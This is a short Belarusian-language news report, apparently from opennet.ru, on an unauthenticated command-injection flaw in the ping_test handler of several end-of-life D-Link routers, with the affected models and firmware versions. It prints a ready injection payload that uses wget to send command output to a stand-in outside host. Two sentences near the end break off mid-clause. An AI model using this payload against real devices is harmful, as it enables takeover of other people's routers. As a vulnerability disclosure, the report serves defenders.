У бесправадных маршрутызатарах D-Link
Цікава, што па задумцы распрацоўшчыкаў прашыўкі выклік "ping_test" павінен выконвацца толькі пасля аўтэнтыфікацыі, але на справе ён выклікаецца ў любым выпадку, незалежна ад уваходу ў web-інтэрфейс. У прыватнасці, пры звароце да скрыпту apply_sec.cgi з перадачай параметра "action=ping_test", скрыпт перакідае на старонку аўтэнтыфікацыі, але пры гэтым выконвае звязанае з ping_test дзеянне. Для выканання кода скарыстана яшчэ адна ўразлівасць у самім ping_test, які выклікае ўтыліту ping без належнай праверкі карэктнасці перададзенага для тэставання IP-адрасы. Напрыклад, для выкліку ўтыліты wget і перадачы на знешні хост вынікаў выканання каманды "echo 1234" дастаткова пазначыць параметр "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$( echo 1234)».
Наяўнасць уразлівасці афіцыйна пацверджана ў мадэлях:
- DIR-655 з прашыўкай 3.02b05 ці старэй;
- DIR-866L з прашыўкай 1.03b04 ці старэй;
- DIR-1565 з прашыўкай 1.01 ці старэй;
- DIR-652 (дадзеных аб версіях праблемных прашывак не прыводзіцца)
Час суправаджэння дадзеных мадэляў ужо скончыўся, таму кампанія D-Link
Пазней высветлілася, што ўразлівасць таксама
Крыніца: opennet.ru